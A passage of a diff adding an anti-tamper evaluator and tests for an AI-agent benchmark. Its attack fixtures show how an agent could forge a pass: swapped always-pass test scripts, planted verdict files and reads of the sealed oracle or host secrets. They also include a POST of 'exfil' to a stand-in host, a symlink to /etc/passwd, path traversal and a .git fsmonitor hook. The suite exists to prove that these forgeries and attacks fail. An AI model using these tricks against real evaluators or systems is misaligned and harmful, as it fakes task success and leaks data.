+ * The sealed, pinned evaluator definition of one task. Lives in the sealed
+ * task store (PRD §5.2), ships inside the evaluator image, and is never
+ * readable from the agent runtime or writable by the candidate tree.
+ */
+export interface TaskEvaluator {
+  readonly task_id: string;
+  /** Records whose rejected decision this task's oracle guards. */
+  readonly record_ids: readonly string[];
+  /**
+   * The evaluator's own functional checks. An EMPTY list can never pass:
+   * a task that asserts nothing certifies nothing.
+   */
+  functional_checks(tree: TreeView, probe: (spec: ProbeSpec) => ProbeResult): readonly FunctionalCheckResult[];
+  /** Inspects the final implementation state only — never the transcript (§13.2). */
+  decision_oracle(tree: TreeView): "SAFE" | "REVIVED";
+}
+
+/** The §4.7 control expectations every sealed task must carry. */
+export interface ControlExpectation {
+  readonly functional_pass: boolean;
+  readonly decision_oracle_code: "SAFE" | "REVIVED";
+}
+
+export interface TaskControls {
+  /** functional PASS, decision SAFE. */
+  readonly good: ControlExpectation;
+  /** functional PASS, decision REVIVED. */
+  readonly bad: ControlExpectation;
+  /** functional FAIL. */
+  readonly noop: ControlExpectation;
+}
+
+/** Why the evaluator refused to even extract a candidate archive. */
+export type IngestRefusalCode =
+  | "archive-too-large"
+  | "too-many-files"
+  | "file-too-large"
+  | "path-too-long"
+  | "path-escapes-tree"
+  | "dot-git-smuggled"
+  | "duplicate-entry"
+  | "symlink-escapes-tree"
+  | "symlink-through-symlink"
+  | "hardlink-refused"
+  | "special-file-refused"
+  | "pax-or-gnu-extension-refused"
+  | "invalid-tar"
+  | "tree-oid-mismatch";
+
+export interface IngestRefusal {
+  readonly code: IngestRefusalCode;
+  readonly detail: string;
+}
+
+/** A successfully materialized candidate tree. */
+export interface IngestedTree {
+  /** Extraction root; read-only on disk. */
+  readonly root: string;
+  /** Recomputed by the evaluator with its own staging — never trusted. */
+  readonly candidate_tree_oid: string;
+  /** Present when the archive carried entries the hygiene gate refused. */
+  readonly refusal: IngestRefusal | null;
+}
+
+/** Hard caps on what one candidate archive may occupy (§12.2 resource limits). */
+export interface IngestLimits {
+  readonly max_total_bytes: number;
+  readonly max_files: number;
+  readonly max_file_bytes: number;
+  readonly max_path_length: number;
+}
+
+export const DEFAULT_INGEST_LIMITS: IngestLimits = {
+  max_total_bytes: 64 * 1024 * 1024,
+  max_files: 20_000,
+  max_file_bytes: 8 * 1024 * 1024,
+  max_path_length: 512,
+};

--- a/bench/cdeb/test-fixtures/evaluator/README.md
+++ b/bench/cdeb/test-fixtures/evaluator/README.md
@@ -1,0 +1,35 @@
+# CDEB evaluator smoke fixtures — disposable, not corpus
+
+These fixtures exist to test the CDEB-06 evaluator pipeline (PRD §12, §22.4).
+They are **disposable smoke material**: none of this is part of the sealed
+30-task corpus (§5.2), and nothing here is a real task prompt or a real
+oracle. The real ones stay sealed until the post-run reveal (§5.3).
+
+Layout:
+
+- `base/` — the "repository" the smoke agent edits: a broken `add` in
+  `src/calc.js`, plus a naive `npm test` that passes regardless. The test
+  script exists exactly so the anti-tamper fixtures have something real to
+  swap.
+- `sealed/smoke-calc-fix.task.ts` — the sealed task module: evaluator-owned
+  functional checks, the decision oracle, and the §4.7 control expectations.
+  Its `--tasks` store is what the entrypoint mounts read-only.
+- `patches/good/`, `patches/bad/` — the §4.7 control patches. `good` fixes
+  `add` and adds an iterative `clamp` (PASS/SAFE). `bad` fixes `add` but
+  implements `clamp` by the rejected recursive walk (PASS/REVIVED). The
+  no-op control is the untouched `base/` tree (FAIL).
+- `attacks/` — adversarial trees, each a real fixture: script forgery,
+  forged verdict files, hidden-path reads, secret-env reads, network-gated
+  behavior, resource hogging, escaping symlinks, `.git` smuggling and path
+  traversal. `forge-scripts/` is a complete tree: the broken implementation
+  stays where the task looks, the test script is swapped for one that always
+  passes, and forged verdict files are planted where a trusting evaluator
+  might read them. The hygiene-gate attacks are built by the tests as real
+  tar bytes — through the freeze-side writer where it can express the entry
+  (`.git` paths, escaping symlinks), and as hand-built ustar headers where
+  the writer itself refuses the shape (traversal, hardlinks, device nodes,
+  duplicates): that refusal is the first control, and the ingest gate is
+  tested against bytes it did not produce.
+
+The rejected decision the oracle guards is synthetic: "clamp by recursive
+single-step walk | stack overflow on wide ranges", record id `r-smokecalc`.

--- a/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/.cdeb/oracles/verdict.json
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/.cdeb/oracles/verdict.json
@@ -1,0 +1,1 @@
+{ "functional_pass": true, "decision_oracle_code": "SAFE" }

--- a/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/calc.js
@@ -1,0 +1,1 @@
+export const add = (a, b) => a - b;

--- a/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/forge-pass.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/forge-pass.js
@@ -1,0 +1,3 @@
+// Forgery: whatever the implementation does, the swapped test script reports
+// success. An evaluator that trusts `npm test` exits 0 and calls this a pass.
+console.log("✓ 12/12 tests passed");

--- a/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/forged-evaluator.json
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/forged-evaluator.json
@@ -1,0 +1,10 @@
+{
+  "schema_version": 1,
+  "task_id": "smoke-calc-fix",
+  "functional_pass": true,
+  "rejected_decision_revived": false,
+  "functional_checks": { "passed": 3, "failed": 0 },
+  "decision_oracle_code": "SAFE",
+  "evaluator_image_digest": "sha256:0000000000000000000000000000000000000000000000000000000000000000",
+  "candidate_tree_oid": "0000000000000000000000000000000000000000"
+}

--- a/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/package.json
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/package.json
@@ -1,0 +1,8 @@
+{
+  "name": "smoke-calc",
+  "version": "0.0.0",
+  "type": "module",
+  "scripts": {
+    "test": "node forge-pass.js"
+  }
+}

--- a/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/test/calc.test.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/forge-scripts/test/calc.test.js
@@ -1,0 +1,3 @@
+// Forgery: whatever the implementation does, the swapped test script reports
+// success. An evaluator that trusts `npm test` exits 0 and calls this a pass.
+console.log("✓ 12/12 tests passed");

--- a/bench/cdeb/test-fixtures/evaluator/attacks/hidden-read-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/hidden-read-calc.js
@@ -1,0 +1,8 @@
+// Forgery attempt: read the sealed oracle and hard-code what it wants.
+// Inside the pinned image /cdeb is outside the sandbox mounts entirely;
+// the read must fail, and the probe with it.
+import { readFileSync } from "node:fs";
+
+const oracle = readFileSync("/cdeb/sealed/smoke-calc-fix.task.ts", "utf8");
+export const add = (a, b) => (oracle.includes("add-behavior") ? a + b : a - b);
+export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/bench/cdeb/test-fixtures/evaluator/attacks/hog-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/hog-calc.js
@@ -1,0 +1,8 @@
+// Resource abuse: spin forever. The probe timeout is the control; the
+// verdict must be FAIL, produced inside the timeout budget.
+export const add = (a, b) => {
+  let acc = 0;
+  for (;;) acc += 1;
+  return acc + a + b;
+};
+export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/bench/cdeb/test-fixtures/evaluator/attacks/leak-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/leak-calc.js
@@ -1,0 +1,13 @@
+// Information-leak probe: prints everything the sandbox lets the process
+// see. The leak test asserts no sealed-store path and no host secret value
+// appears in these bytes, and that NODE_OPTIONS is present-but-empty (the
+// hermetic env pins it empty rather than leaving it to the host).
+console.log(JSON.stringify({
+  env: Object.keys(process.env).sort(),
+  nodeOptions: process.env.NODE_OPTIONS ?? null,
+  secret: process.env.CDEB_STUDY_SECRET ?? null,
+  argv: process.argv.slice(1),
+  cwd: process.cwd(),
+}));
+export const add = (a, b) => a + b;
+export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/bench/cdeb/test-fixtures/evaluator/attacks/network-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/network-calc.js
@@ -1,0 +1,9 @@
+// Forgery attempt + exfiltration: phone home, and work only when the call
+// succeeds. Under `--network none` (study) the fetch fails, so the probe
+// fails; this fixture also demonstrates the channel the sandbox closes.
+const reached = await fetch("https://cdeb-exfil.invalid/tree", { method: "POST", body: "exfil" })
+  .then(() => 1)
+  .catch(() => 0);
+
+export const add = (a, b) => (reached === 1 ? a + b : a - b);
+export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/bench/cdeb/test-fixtures/evaluator/attacks/secret-env-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/secret-env-calc.js
@@ -1,0 +1,5 @@
+// Forgery attempt: behave correctly only when a host secret is visible in
+// the process environment. The hermetic env carries no secrets, so add
+// stays broken and the behavior probe fails.
+export const add = (a, b) => (process.env.CDEB_STUDY_SECRET ? a + b : a - b);
+export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/bench/cdeb/test-fixtures/evaluator/base/README.md
+++ b/bench/cdeb/test-fixtures/evaluator/base/README.md
@@ -1,0 +1,1 @@
+smoke-calc: fixture repository for the CDEB evaluator sandbox tests.

--- a/bench/cdeb/test-fixtures/evaluator/base/package.json
+++ b/bench/cdeb/test-fixtures/evaluator/base/package.json
@@ -1,0 +1,8 @@
+{
+  "name": "smoke-calc",
+  "version": "0.0.0",
+  "type": "module",
+  "scripts": {
+    "test": "node test/calc.test.js"
+  }
+}

--- a/bench/cdeb/test-fixtures/evaluator/base/src/calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/base/src/calc.js
@@ -1,0 +1,3 @@
+// Smoke fixture: add is broken on purpose. The task is to fix it and add
+// clamp(value, low, high).
+export const add = (a, b) => a - b;

--- a/bench/cdeb/test-fixtures/evaluator/base/test/calc.test.js
+++ b/bench/cdeb/test-fixtures/evaluator/base/test/calc.test.js
@@ -1,0 +1,2 @@
+// A naive test that always passes — exactly the surface a forger swaps in.
+console.log("ok");

--- a/bench/cdeb/test-fixtures/evaluator/patches/bad/calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/patches/bad/calc.js
@@ -1,0 +1,9 @@
+export const add = (a, b) => a + b;
+
+// The rejected approach: walk the value back into range one step at a time.
+// Ruled-out: clamp by recursive single-step walk | stack overflow on wide ranges.
+export const clamp = (value, low, high) => {
+  if (value < low) return clamp(value + 1, low, high);
+  if (value > high) return clamp(value - 1, low, high);
+  return value;
+};

--- a/bench/cdeb/test-fixtures/evaluator/patches/good/calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/patches/good/calc.js
@@ -1,0 +1,7 @@
+export const add = (a, b) => a + b;
+
+export const clamp = (value, low, high) => {
+  if (value < low) return low;
+  if (value > high) return high;
+  return value;
+};

--- a/bench/cdeb/test-fixtures/evaluator/sealed/smoke-calc-fix.task.ts
+++ b/bench/cdeb/test-fixtures/evaluator/sealed/smoke-calc-fix.task.ts
@@ -1,0 +1,87 @@
+/**
+ * Disposable smoke task for the CDEB-06 evaluator pipeline (see ../README.md).
+ * This file plays the role of a §5.2 SEALED task module: it ships inside the
+ * evaluator image / sealed store, the agent never sees it, and the verdict
+ * authority lives here — not in anything the candidate tree contains.
+ *
+ * Synthetic rejected decision under guard:
+ *   Ruled-out: clamp by recursive single-step walk | stack overflow on wide
+ *   ranges.   (record id r-smokecalc)
+ */
+
+import type {
+  FunctionalCheckResult,
+  ProbeResult,
+  ProbeSpec,
+  TaskControls,
+  TaskEvaluator,
+  TreeView,
+} from "../../../evaluator/types.ts";
+
+const meets = (spec: { expect_exit: number; expect_stdout?: string }, result: ProbeResult): boolean => {
+  if (result.timed_out || result.exit_code !== spec.expect_exit) return false;
+  if (spec.expect_stdout !== undefined && result.stdout.replace(/\n$/, "") !== spec.expect_stdout) return false;
+  return true;
+};
+
+const task: TaskEvaluator = {
+  task_id: "smoke-calc-fix",
+  record_ids: ["r-smokecalc"],
+
+  functional_checks(tree: TreeView, probe: (spec: ProbeSpec) => ProbeResult): readonly FunctionalCheckResult[] {
+    const checks: FunctionalCheckResult[] = [];
+    const source = tree.read("src/calc.js");
+
+    checks.push({
+      name: "calc-source-present",
+      passed: source !== null && source.includes("export const add"),
+    });
+    checks.push({
+      name: "clamp-exported",
+      passed: source !== null && /export const clamp\b/.test(source),
+    });
+
+    // Behavioral probes: evaluator-owned command and arguments. The tree's
+    // own package.json/test scripts are never consulted and never run.
+    const addSpec: ProbeSpec = {
+      argv: ["-e", "import('./src/calc.js').then((m) => console.log(String(m.add(2, 3))))"],
+      expect_exit: 0,
+      expect_stdout: "5",
+      timeout_ms: 4_000,
+    };
+    checks.push({ name: "add-behavior", passed: meets(addSpec, probe(addSpec)) });
+
+    const clampSpec: ProbeSpec = {
+      argv: [
+        "-e",
+        "import('./src/calc.js').then((m) => console.log([m.clamp(-2, 0, 3), m.clamp(9, 0, 3), m.clamp(2, 0, 3)].join(' ')))",
+      ],
+      expect_exit: 0,
+      expect_stdout: "0 3 2",
+      timeout_ms: 4_000,
+    };
+    checks.push({ name: "clamp-behavior", passed: meets(clampSpec, probe(clampSpec)) });
+
+    return checks;
+  },
+
+  decision_oracle(tree: TreeView): "SAFE" | "REVIVED" {
+    // Final implementation state only (§13.2): the recursive walk shows up
+    // as clamp calling itself. One `clamp(` occurrence is the definition's
+    // export line in a direct-call implementation; self-calls need two more.
+    const source = tree.read("src/calc.js") ?? "";
+    const selfCalls = (source.match(/\bclamp\s*\(/g) ?? []).length;
+    if (selfCalls >= 2) return "REVIVED";
+    if (/recursiveClamp/.test(source)) return "REVIVED";
+    return "SAFE";
+  },
+};
+
+export default task;
+
+/** §4.7 control expectations, sealed with the task. */
+export const controls: TaskControls = {
+  good: { functional_pass: true, decision_oracle_code: "SAFE" },
+  bad: { functional_pass: true, decision_oracle_code: "REVIVED" },
+  noop: { functional_pass: false, decision_oracle_code: "SAFE" },
+};

--- a/test/cdeb-evaluator-adversarial.test.ts
+++ b/test/cdeb-evaluator-adversarial.test.ts
@@ -1,0 +1,334 @@
+/**
+ * CDEB-06 anti-tamper acceptance (PRD §12.3/§12.5, ticket: "a candidate
+ * cannot forge a pass").
+ *
+ * Every attack here is a real fixture tree or real crafted archive bytes —
+ * no mocked attackers. Where a control exists to stop an attack, the test
+ * also demonstrates the attack WINS against the forbidden mechanism, so the
+ * assertion has teeth: remove the control and the suite flips.
+ *
+ * Enforcement surfaces, stated per test because they differ:
+ *   - structural controls (never trust candidate scripts/verdicts, hermetic
+ *     env, hygiene gate) hold on every machine and are exercised fully here;
+ *   - kernel controls (network=none, PID/memory caps) belong to the pinned
+ *     OCI image; where this sandbox provides them (no network egress in the
+ *     execution environment) the failure is genuine, and the test says which
+ *     surface it ran on.
+ */
+
+import { spawnSync } from "node:child_process";
+import { readFileSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+
+import { afterAll, describe, expect, it } from "vitest";
+
+import { extractTreeArchive, renderArchive, entriesFromDirectory, type ArchiveEntry } from "../bench/cdeb/evaluator/tree.ts";
+import { ingestFinalTree } from "../bench/cdeb/evaluator/ingest.ts";
+import { runProbe } from "../bench/cdeb/evaluator/probe.ts";
+import { freezeFinalTree } from "../bench/cdeb/evaluator/freeze-tree.ts";
+import { evaluateLocal } from "../bench/cdeb/evaluator/runner-local.ts";
+import {
+  buildTree,
+  cleanupScratch,
+  snapshotFixtures,
+  evaluatePrepared,
+  expectVerdict,
+  fixtureFile,
+  prepareRun,
+  SEALED_DIR,
+  TASK_ID,
+  tempDir,
+  TEST_IMAGE_DIGEST,
+} from "./cdeb-evaluator-helpers.ts";
+
+const fixtureSnapshot = snapshotFixtures();
+
+afterAll(() => {
+  cleanupScratch();
+  expect(snapshotFixtures()).toEqual(fixtureSnapshot);
+});
+
+/* -------------------------------------------------------------------------- */
+/* Raw ustar writer for MALFORMED archives. renderArchive refuses to          */
+/* serialize attacks, which is exactly why crafted bytes need their own pen.  */
+/* -------------------------------------------------------------------------- */
+
+const rawUstar = (entries: { name: string; typeflag: string; content?: Buffer; linkname?: string }[]): Buffer => {
+  const chunks: Buffer[] = [];
+  for (const entry of entries) {
+    const header = Buffer.alloc(512);
+    Buffer.from(entry.name, "utf8").copy(header, 0);
+    Buffer.from("0000644", "ascii").copy(header, 100);
+    Buffer.from("0000000", "ascii").copy(header, 108);
+    Buffer.from("0000000", "ascii").copy(header, 116);
+    const size = entry.content?.length ?? 0;
+    Buffer.from(size.toString(8).padStart(11, "0"), "ascii").copy(header, 124);
+    Buffer.from("00000000000", "ascii").copy(header, 136);
+    header.write(entry.typeflag, 156, "ascii");
+    if (entry.linkname !== undefined) Buffer.from(entry.linkname, "utf8").copy(header, 157);
+    header.write("ustar", 257, "ascii");
+    header.write("00", 263, "ascii");
+    header.fill(0x20, 148, 156);
+    let sum = 0;
+    for (const byte of header) sum += byte;
+    header.write(sum.toString(8).padStart(6, "0"), 148, "ascii");
+    header.writeUInt8(0, 154);
+    header.writeUInt8(0x20, 155);
+    chunks.push(header);
+    if (size > 0) {
+      chunks.push(entry.content!);
+      const pad = (512 - (size % 512)) % 512;
+      if (pad > 0) chunks.push(Buffer.alloc(pad));
+    }
+  }
+  chunks.push(Buffer.alloc(1024));
+  return Buffer.concat(chunks);
+};
+
+/** The good tree's entries, as a base for splicing attack entries into. */
+const goodEntries = (): ArchiveEntry[] => {
+  const tree = buildTree("entries-base", { "src/calc.js": fixtureFile("patches", "good", "calc.js") });
+  const files = ["package.json", "README.md", "src/calc.js", "test/calc.test.js"];
+  return entriesFromDirectory(tree, files);
+};
+
+const archiveToFile = (label: string, bytes: Buffer): string => {
+  const path = join(tempDir(label), "final-tree.tar");
+  writeFileSync(path, bytes);
+  return path;
+};
+
+/**
+ * Pipeline-level run of a CRAFTED archive (no claimed OID — the attack bytes
+ * are the whole input, exactly as the orchestrator would hand them over).
+ */
+const evaluateCrafted = (archivePath: string) =>
+  evaluateLocal({
+    tasksDir: SEALED_DIR,
+    taskId: TASK_ID,
+    archivePath,
+    imageDigest: TEST_IMAGE_DIGEST,
+    timeoutMs: 90_000,
+  });
+
+/* -------------------------------------------------------------------------- */
+/* Forgery                                                                    */
+/* -------------------------------------------------------------------------- */
+
+describe("package/test-script tamper (§12.5: 결과 조작 실패)", () => {
+  const forgeOverrides = {
+    "src/calc.js": fixtureFile("attacks", "forge-scripts", "calc.js"),
+    "package.json": fixtureFile("attacks", "forge-scripts", "package.json"),
+    "forge-pass.js": fixtureFile("attacks", "forge-scripts", "forge-pass.js"),
+    "forged-evaluator.json": fixtureFile("attacks", "forge-scripts", "forged-evaluator.json"),
+    ".cdeb/oracles/verdict.json": fixtureFile("attacks", "forge-scripts", ".cdeb", "oracles", "verdict.json"),
+  };
+
+  it("the forbidden mechanism is fooled; the evaluator is not", () => {
+    const tree = buildTree("forge-naive", forgeOverrides);
+
+    // Teeth: an evaluator that trusts the candidate's `npm test` — the exact
+    // mechanism §12.3 prohibits — exits 0 and calls this tree a pass.
+    const naive = spawnSync("npm", ["test", "--silent"], { cwd: tree, encoding: "utf8", timeout: 60_000 });
+    expect(naive.status).toBe(0);
+    expect(naive.stdout).toContain("12/12 tests passed");
+
+    // The real pipeline judges the same tree a functional failure.
+    const run = prepareRun("forge", tree);
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+
+  it("forged verdict files in the tree are inert bytes", () => {
+    const run = prepareRun("forge-again", buildTree("forge-again", forgeOverrides));
+    const first = evaluatePrepared(run);
+    const verdict = expectVerdict(first);
+    // The forged file claims functional_pass true; the verdict says false.
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.evaluator_image_digest).not.toBe("sha256:" + "0".repeat(64));
+    // And the forgery cannot even make the verdict shape diverge.
+    const forged = JSON.parse(fixtureFile("attacks", "forge-scripts", "forged-evaluator.json")) as Record<string, unknown>;
+    expect(verdict.functional_pass).not.toBe(forged.functional_pass);
+  });
+
+  it("the forged tree still evaluates deterministically to FAIL", () => {
+    const run = prepareRun("forge-det", buildTree("forge-det", forgeOverrides));
+    const first = evaluatePrepared(run);
+    const second = evaluatePrepared(run);
+    expect(first.rawStdout.equals(second.rawStdout)).toBe(true);
+    expect(expectVerdict(second).functional_pass).toBe(false);
+  });
+});
+
+/* -------------------------------------------------------------------------- */
+/* Hidden paths, secrets, network                                             */
+/* -------------------------------------------------------------------------- */
+
+describe("hidden evaluator path read attempt (§12.5)", () => {
+  it("a probe that reads the sealed store fails the evaluation", () => {
+    const run = prepareRun(
+      "hidden-read",
+      buildTree("hidden-read", { "src/calc.js": fixtureFile("attacks", "hidden-read-calc.js") }),
+    );
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.decision_oracle_code).toBe("SAFE");
+  });
+
+  it("probe env/argv/cwd leak no sealed-store location or host secret names", () => {
+    // Teeth: poison the outer environment first — if the probe inherited
+    // anything, the secret value would appear in the printed bytes.
+    process.env.CDEB_STUDY_SECRET = "hunter2";
+    process.env.NODE_OPTIONS = "--max-old-space-size=4321";
+    try {
+    const tree = buildTree("leak", { "src/calc.js": fixtureFile("attacks", "leak-calc.js") });
+    const frozen = freezeFinalTree(tree, tempDir("leak-freeze"));
+    const ingested = ingestFinalTree(frozen.archive_zst, tempDir("leak-ingest"));
+    const result = runProbe(
+      { argv: ["-e", "await import('./src/calc.js')"], expect_exit: 0, timeout_ms: 8_000 },
+      { treeRoot: ingested.root, scratchDir: tempDir("leak-scratch") },
+    );
+    expect(result.exit_code).toBe(0);
+    const leaked = JSON.parse(result.stdout.trim()) as {
+      env: string[]; nodeOptions: string | null; secret: string | null; argv: string[]; cwd: string;
+    };
+    expect(leaked.env).not.toContain("CDEB_STUDY_SECRET");
+    expect(leaked.env).not.toContain("AWS_SECRET_ACCESS_KEY");
+    // NODE_OPTIONS is pinned empty by the hermetic env — present and empty,
+    // never inherited from whatever the host set.
+    expect(leaked.nodeOptions).toBe("");
+    expect(leaked.secret).toBeNull();
+    for (const arg of leaked.argv) expect(arg).not.toContain("sealed");
+    expect(leaked.cwd).toBe(ingested.root);
+    } finally {
+      delete process.env.CDEB_STUDY_SECRET;
+      delete process.env.NODE_OPTIONS;
+    }
+  });
+});
+
+describe("host secret read attempt (§12.5)", () => {
+  it("a secret in the outer environment never reaches the verdict", () => {
+    const run = prepareRun(
+      "secret",
+      buildTree("secret", { "src/calc.js": fixtureFile("attacks", "secret-env-calc.js") }),
+    );
+    // With the secret visible to the TEST process: if the runner inherited
+    // anything, add would start working and this tree would pass.
+    const verdict = expectVerdict(evaluatePrepared(run, { env: { CDEB_STUDY_SECRET: "hunter2" } }));
+    expect(verdict.functional_pass).toBe(false);
+  });
+});
+
+describe("network access attempt (§12.5)", () => {
+  it("network-gated behavior evaluates to FAIL", () => {
+    // Study surface: `docker run --network none` (runner-oci.ts). Development
+    // surface here: the execution sandbox denies egress, so the fetch fails
+    // genuinely (ENOTFOUND). On a daemon-less dev machine WITH egress this
+    // fixture would still gate the verdict on the fetch result — the OCI
+    // control is what makes the guarantee absolute, and the row surface says
+    // which one produced it.
+    const run = prepareRun(
+      "network",
+      buildTree("network", { "src/calc.js": fixtureFile("attacks", "network-calc.js") }),
+    );
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(false);
+  });
+});
+
+/* -------------------------------------------------------------------------- */
+/* Resource abuse                                                             */
+/* -------------------------------------------------------------------------- */
+
+describe("resource abuse (§12.5: 제한됨)", () => {
+  it("a probe that spins is killed by the timeout and judged FAIL", () => {
+    const run = prepareRun("hog", buildTree("hog", { "src/calc.js": fixtureFile("attacks", "hog-calc.js") }));
+    const started = Date.now();
+    const verdict = expectVerdict(evaluatePrepared(run, { timeoutMs: 90_000 }));
+    const elapsed = Date.now() - started;
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+    // The timeout (4s per probe in the sealed task) bounds the evaluation,
+    // with margin for process startup — it is not the machine's patience.
+    expect(elapsed).toBeLessThan(45_000);
+  });
+});
+
+/* -------------------------------------------------------------------------- */
+/* Archive hygiene gate                                                       */
+/* -------------------------------------------------------------------------- */
+
+describe("archive hygiene gate", () => {
+  it("a symlink escaping the tree is refused, unit and pipeline", () => {
+    const bytes = renderArchive([
+      ...goodEntries(),
+      { path: "leak", type: "symlink", content: Buffer.alloc(0), linkTarget: "../../../../../../../etc/passwd", executable: false },
+    ]);
+    const unit = extractTreeArchive(bytes, tempDir("sym-unit"));
+    expect(unit.refusal?.code).toBe("symlink-escapes-tree");
+
+    const path = archiveToFile("sym-pipe", bytes);
+    const verdict = expectVerdict(evaluateCrafted(path));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+
+  it("a path-traversal entry is refused", () => {
+    const bytes = rawUstar([
+      { name: "../outside.js", typeflag: "0", content: Buffer.from("payload") },
+      { name: "src/calc.js", typeflag: "0", content: Buffer.from(fixtureFile("patches", "good", "calc.js")) },
+    ]);
+    const unit = extractTreeArchive(bytes, tempDir("trav-unit"));
+    expect(unit.refusal?.code).toBe("path-escapes-tree");
+  });
+
+  it("a smuggled .git is refused before git ever runs in the tree", () => {
+    const bytes = rawUstar([
+      { name: ".git/config", typeflag: "0", content: Buffer.from("[core]\n\tfsmonitor = /evil/hook\n") },
+      { name: "src/calc.js", typeflag: "0", content: Buffer.from(fixtureFile("patches", "good", "calc.js")) },
+    ]);
+    const unit = extractTreeArchive(bytes, tempDir("git-unit"));
+    expect(unit.refusal?.code).toBe("dot-git-smuggled");
+
+    const path = archiveToFile("git-pipe", bytes);
+    const verdict = expectVerdict(evaluateCrafted(path));
+    expect(verdict.functional_pass).toBe(false);
+  });
+
+  it("hardlinks and special files are refused", () => {
+    const hard = rawUstar([{ name: "link", typeflag: "1", linkname: "src/calc.js" }]);
+    expect(extractTreeArchive(hard, tempDir("hard-unit")).refusal?.code).toBe("hardlink-refused");
+    const fifo = rawUstar([{ name: "fifo", typeflag: "6" }]);
+    expect(extractTreeArchive(fifo, tempDir("fifo-unit")).refusal?.code).toBe("special-file-refused");
+    const pax = rawUstar([{ name: "pax", typeflag: "x", content: Buffer.from("10 a=b\n") }]);
+    expect(extractTreeArchive(pax, tempDir("pax-unit")).refusal?.code).toBe("pax-or-gnu-extension-refused");
+  });
+
+  it("bombs hit the caps", () => {
+    const manyFiles = rawUstar(
+      Array.from({ length: 20_001 }, (_, index) => ({
+        name: `f${String(index).padStart(6, "0")}.txt`,
+        typeflag: "0",
+        content: Buffer.from("x"),
+      })),
+    );
+    expect(extractTreeArchive(manyFiles, tempDir("bomb-files")).refusal?.code).toBe("too-many-files");
+
+    const bigFile = renderArchive([
+      { path: "big.bin", type: "file", content: Buffer.alloc(9 * 1024 * 1024, 1), linkTarget: "", executable: false },
+    ]);
+    expect(extractTreeArchive(bigFile, tempDir("bomb-size")).refusal?.code).toBe("file-too-large");
+  });
+
+  it("a claimed OID that does not match the recomputed one is refused", () => {
+    const run = prepareRun("oid", buildTree("oid", { "src/calc.js": fixtureFile("patches", "good", "calc.js") }));
+    const verdict = expectVerdict(evaluatePrepared(run, { claimedOid: "a".repeat(40) }));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.candidate_tree_oid).toBe(run.frozen.final_tree_oid);
+
+    const ingested = ingestFinalTree(readFileSync(run.archivePath), tempDir("oid-unit"), { claimedOid: "a".repeat(40) });
+    expect(ingested.refusal?.code).toBe("tree-oid-mismatch");
+  });
+});

--- a/test/cdeb-evaluator-antitamper.test.ts
+++ b/test/cdeb-evaluator-antitamper.test.ts
@@ -1,0 +1,210 @@
+/**
+ * CDEB-06 acceptance: a candidate cannot forge a pass (PRD §26, §12.3/§12.5).
+ *
+ * The agent that wrote the candidate tree is an UNTRUSTED AUTHOR of it. Every
+ * tree here is real: real fixture bytes, frozen through the real freeze
+ * pipeline, judged by the real entrypoint in a subprocess. The attack trees
+ * are not mocks — they are the artifacts a forging candidate would leave.
+ *
+ * The forgery tests are written so that removing the control they guard
+ * flips the verdict and fails the test:
+ *
+ *   - if the engine ever executes candidate-owned commands (package.json
+ *     scripts, candidate test runners — §12.3), the forge-scripts tree
+ *     reports success and the verdict flips to PASS;
+ *   - if the engine ever parses a file that LOOKS like a verdict
+ *     (`evaluator.json`, `.cdeb/oracles/*`), the planted forged verdicts
+ *     flip it to PASS;
+ *   - if the sealed task module were loaded from the candidate tree, the
+ *     planted lenient oracle flips it to PASS;
+ *   - if ingestion trusted the freeze's claimed OID instead of recomputing
+ *     it, the mismatched tree below would evaluate instead of being refused.
+ */
+
+import { spawnSync } from 'node:child_process';
+import { readFileSync } from 'node:fs';
+import { join } from 'node:path';
+
+import { afterAll, describe, expect, it } from 'vitest';
+
+import { ingestFinalTree } from '../bench/cdeb/evaluator/ingest.ts';
+import {
+  FIXTURE_ROOT,
+  SEALED_DIR,
+  TASK_ID,
+  TEST_IMAGE_DIGEST,
+  buildTree,
+  cleanupScratch,
+  evaluatePrepared,
+  expectVerdict,
+  fixtureFile,
+  prepareRun,
+  tempDir,
+} from './cdeb-evaluator-helpers.ts';
+import { controls } from '../bench/cdeb/test-fixtures/evaluator/sealed/smoke-calc-fix.task.ts';
+
+afterAll(() => {
+  cleanupScratch();
+});
+
+describe('CDEB-06 dual controls calibrate: good/bad/no-op behave as sealed', () => {
+  it('good control passes functionally and stays SAFE', () => {
